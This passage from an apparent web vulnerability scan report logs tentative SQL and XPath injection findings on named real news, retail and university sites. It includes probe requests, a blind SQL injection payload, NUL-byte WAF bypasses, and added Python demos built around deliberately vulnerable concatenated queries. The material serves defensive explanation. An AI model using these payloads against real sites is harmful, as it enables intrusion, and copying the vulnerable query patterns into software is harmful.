There is probably no need to perform a second URL-decode of the value of the fPage cookie, as the web server (or application framework) will already have carried out one decode; that second decode is what lets %2527 reach the query as a quote. In any case, the application should perform its input validation after all canonicalisation (decoding, case folding and the like) has been carried out, so that the value being checked is the value that is actually used, and the query itself should be parameterised so that a stray quote cannot alter its structure.
Request 1
GET /warriors/ci_16794092?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16794092?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]...
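The following is an added example, not part of the scan report or of the mercurynews.com application, that models the fPage entry above end to end: a quote filter applied to the cookie as the web server hands it over (decoded once), a needless second URL-decode, and a query built by string concatenation against an in-memory SQLite table. It reproduces the scanner's signal (one quote causes a database error, two quotes do not) and shows the %2527 payload reaching the query as a quote, next to a version that validates the canonical value once and parameterises the query. The filter, the table and its rows are assumptions made for the example; only the cookie name fPage and the probe values come from the report.

```python
import sqlite3
import urllib.parse

# Fragments the constructed pre-decode filter looks for. This is a stand-in
# for whatever the real application checks; it is not taken from the report.
BLOCKED_FRAGMENTS = ("'", '"', "--")


def setup_db() -> sqlite3.Connection:
    """Constructed schema: a 'pages' table keyed by the fPage flag."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (fpage TEXT, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [("false", "public story"), ("true", "members-only story")])
    return conn


def quote_filter_passes(value: str) -> bool:
    """Runs on the value as the web server hands it over (decoded once)."""
    return not any(frag in value for frag in BLOCKED_FRAGMENTS)


def vulnerable_lookup(conn: sqlite3.Connection, once_decoded: str) -> list:
    """The pattern the report describes: filter, then decode a second time,
    then build the SQL by concatenation."""
    if not quote_filter_passes(once_decoded):
        raise PermissionError("blocked by filter")
    value = urllib.parse.unquote(once_decoded)  # the needless second decode
    sql = f"SELECT title FROM pages WHERE fpage = '{value}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, once_decoded: str) -> list:
    """Validate the canonical value (no further decoding) against an
    allow-list, then parameterise so the value cannot alter the query."""
    if once_decoded not in ("true", "false"):
        raise ValueError("fPage must be 'true' or 'false'")
    return conn.execute("SELECT title FROM pages WHERE fpage = ?",
                        (once_decoded,)).fetchall()


def probe(conn: sqlite3.Connection, lookup, once_decoded: str) -> str:
    """Classify one probe the way the scanner's heuristic does."""
    try:
        rows = lookup(conn, once_decoded)
    except sqlite3.Error:          # the 'general error message'
        return "sql-error"
    except PermissionError:
        return "blocked"
    except ValueError:
        return "rejected"
    return f"ok({len(rows)})"


def run_demo() -> dict:
    """Maps each probe to (vulnerable outcome, hardened outcome). The values
    are what the application sees after the web server's single URL-decode."""
    conn = setup_db()
    cases = {
        "quote":         "false'",                           # sent as false'
        "double_enc":    "false%27",                         # sent as false%2527
        "double_enc_x2": "false%27%27",                      # sent as false%2527%2527
        "double_enc_or": "false%27%20OR%20%271%27%3D%271",   # false%2527 OR '1'='1
    }
    return {name: (probe(conn, vulnerable_lookup, v), probe(conn, safe_lookup, v))
            for name, v in cases.items()}


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:14} vulnerable={outcome[0]:10} hardened={outcome[1]}")
```

The "double_enc" and "double_enc_x2" rows are the scanner's two probes: the first leaves an unterminated string literal and raises a database error, the second is a valid escaped quote and returns normally. The "double_enc_or" row shows why that difference matters, since the same path returns every row once the quote is followed by an OR clause. The hardened version rejects all four before any SQL is built, and even a value that slipped past the allow-list would be bound as data.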
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /weird-news/ci_16784172 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='ST. CLOUD, Minn -- Two teenage boys from central Minnesota are accused of stealing at least ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /weird-news/ci_16784172 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/weird-news/ci_16784172?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:44:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:44:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 445
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
1.283. https://www.starbucks.com/account/partneracct/IDMLogin [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: https://www.starbucks.com
Path: /account/partneracct/IDMLogin
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
UserName=-1 OR 1=1)) AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25),1,2))--%20&PassWord=3&sign-in=Sign+In&1%00'=1
Response 1 (redirected)
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.starbucks.com/error
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 01:00:12 GMT
Content-Length: 154
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://www.starbucks.com/error">here</a></body>
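The following is an added example, not part of the scan report and not modelled on any particular WAF product, of why the %00 prefix works against a filter written in native code and what a correct filter looks like. A native-code check that walks its input with strstr()/strchr() stops at the first NUL byte, so everything after it is invisible to the filter but still reaches the application. The example emulates that truncation in Python, runs the report's probe and two variants through it, and contrasts it with a length-aware filter that inspects every byte and refuses NUL outright. The parameter name UserName is taken from the request above; the table, the row and the application's habit of dropping NUL bytes when it canonicalises input are assumptions made for the example.

```python
import sqlite3
import urllib.parse

# Signatures the constructed WAF looks for, after percent-decoding the input.
SIGNATURES = (b"'", b'"', b"--", b"/*", b" or ", b"union ")


def c_string_view(data: bytes) -> bytes:
    """Emulates what strstr()/strchr() see: the bytes up to the first NUL.
    This stands in for a native-code WAF; no real product is modelled."""
    nul = data.find(b"\x00")
    return data if nul < 0 else data[:nul]


def waf_native(decoded_query: bytes) -> bool:
    """Native-style check: blocks only if a signature appears before the NUL."""
    view = c_string_view(decoded_query).lower()
    return not any(sig in view for sig in SIGNATURES)


def waf_length_aware(decoded_query: bytes) -> bool:
    """Scans the full declared length and also rejects NUL outright, since
    no legitimate form field, cookie or header contains one."""
    if b"\x00" in decoded_query:
        return False
    view = decoded_query.lower()
    return not any(sig in view for sig in SIGNATURES)


def handle(raw_query: str, waf) -> str:
    """One request through the WAF and then through a vulnerable handler."""
    # The WAF inspects the percent-decoded bytes, so %00 becomes a real NUL.
    if not waf(urllib.parse.unquote_to_bytes(raw_query)):
        return "blocked"
    params = dict(urllib.parse.parse_qsl(raw_query, keep_blank_values=True))
    # Assumption for the example: the application drops NUL bytes when it
    # canonicalises input, so the byte that stopped the WAF never reaches SQL.
    username = params.get("UserName", "").replace("\x00", "")
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice')")
    try:  # string concatenation: the actual vulnerability the WAF was hiding
        rows = conn.execute(f"SELECT name FROM users WHERE name = '{username}'").fetchall()
    except sqlite3.Error:
        return "sql-error"
    return f"ok({len(rows)})"


def run_demo() -> dict:
    """Maps each probe to (native WAF outcome, length-aware WAF outcome)."""
    probes = {
        "quote":          "UserName=%27",                    # plain ' is caught by both
        "nul_quote":      "UserName=%00%27",                 # the report's %00' probe
        "nul_two_quotes": "UserName=%00%27%27",              # the report's second probe
        "nul_inject":     "UserName=%00x%27%20OR%20%271%27%3D%271",  # constructed
    }
    return {name: (handle(q, waf_native), handle(q, waf_length_aware))
            for name, q in probes.items()}


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:15} native={outcome[0]:10} length_aware={outcome[1]}")
```

Behind the native-style filter the two probes behave exactly as the report describes (error for one quote, clean response for two), and the constructed "nul_inject" row shows the bypass turning into a real injection. The length-aware filter stops all of them, but as the remediation text says, that only restores the WAF as a second line; the concatenated query in handle() is the defect to fix.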
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /card/manage/check-your-balance HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 1
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /error/
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:43:18 GMT
Connection: close
Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/manage/check-your-balance HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 2
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:43:22 GMT
Connection: close
Content-Length: 38437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /card/rewards/card-rewards-canada HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /error/
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:44:19 GMT
Connection: close
Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/rewards/card-rewards-canada HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:44:21 GMT
Connection: close
Content-Length: 37056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /card/rewards/program-information HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 1
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /error/
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:43:32 GMT
Connection: close
Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/rewards/program-information HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 2
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:43:35 GMT
Connection: close
Content-Length: 42652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The .SbuxAuth cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the .SbuxAuth cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /card/starbucks-gold HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: .SbuxAuth=%00'; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 1
HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /error/
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:40:05 GMT
Connection: close
Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/starbucks-gold HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: .SbuxAuth=%00''; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 2
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 07:40:08 GMT
Connection: close
Content-Length: 36235
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the "error" in Response 1 is a PHP fatal error for exceeding the 30-second maximum execution time in theme.inc, and both responses are 404s; a timeout on a single request is weak evidence of a database error, so repeat the two probes several times and look for a database-specific message before treating this instance as confirmed.
Request 1
GET /sites'/all/modules/drupal-contrib/nice_menus/superfish/js/jquery.bgiframe.min.js?p HTTP/1.1
Host: www.ucsc-extension.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 1
HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 07:54:22 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 08 Dec 2010 07:54:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 140
Connection: close
Content-Type: text/html; charset=utf-8
<br /> <b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>C:\wamp\www\includes\theme.inc</b> on line <b>648</b><br />
Request 2
GET /sites''/all/modules/drupal-contrib/nice_menus/superfish/js/jquery.bgiframe.min.js?p HTTP/1.1
Host: www.ucsc-extension.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 2
HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 07:54:53 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 08 Dec 2010 07:54:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20787
<HTML>
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verify-v1" content="sFvtITlAUhqlLRlriu4OWFB1IYUYXEDykhl+jHxnJrE=" /> <title> Page not found ...[SNIP]...
1.289. http://www.ucsc-extension.edu/video/guy-kawasaki [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.ucsc-extension.edu
Path: /video/guy-kawasaki
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the previous instance on this host, Response 1 is a PHP maximum-execution-time fatal error (here in nodewords/includes/taxonomy.inc) rather than a database error message, and both responses are 200s, so this needs the same corroboration before it is reported as confirmed.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/guy-kawasaki?1%00'=1 HTTP/1.1
Host: www.ucsc-extension.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 1
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 10:22:24 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 08 Dec 2010 10:22:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 185
Connection: close
Content-Type: text/html; charset=utf-8
<br /> <b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>C:\wamp\www\sites\all\modules\drupal-contrib\nodewords\includes\taxonomy.inc</b> on line <b>17</b><br />
Request 2
GET /video/guy-kawasaki?1%00''=1 HTTP/1.1
Host: www.ucsc-extension.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 10:22:55 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 08 Dec 2010 10:22:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22576
<HTML>
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verify-v1" content="sFvtITlAUhqlLRlriu4OWFB1IYUYXEDykhl+jHxnJrE=" /> <title> Guy Kawasaki: E ...[SNIP]...
The advid parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the advid parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs. Note that the stack trace in the response shows the exception raised inside System.Xml.XmlTextReaderImpl while an XPathDocument is being loaded from a string (Travidia.Web.Generic.XpdFromString), that is, while XML is being parsed rather than while an XPath expression is evaluated, so the quote may be breaking an XML document that the parameter is embedded in rather than a query. Either way the value reaches an XML layer unescaped, and the validation described under Issue remediation applies.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
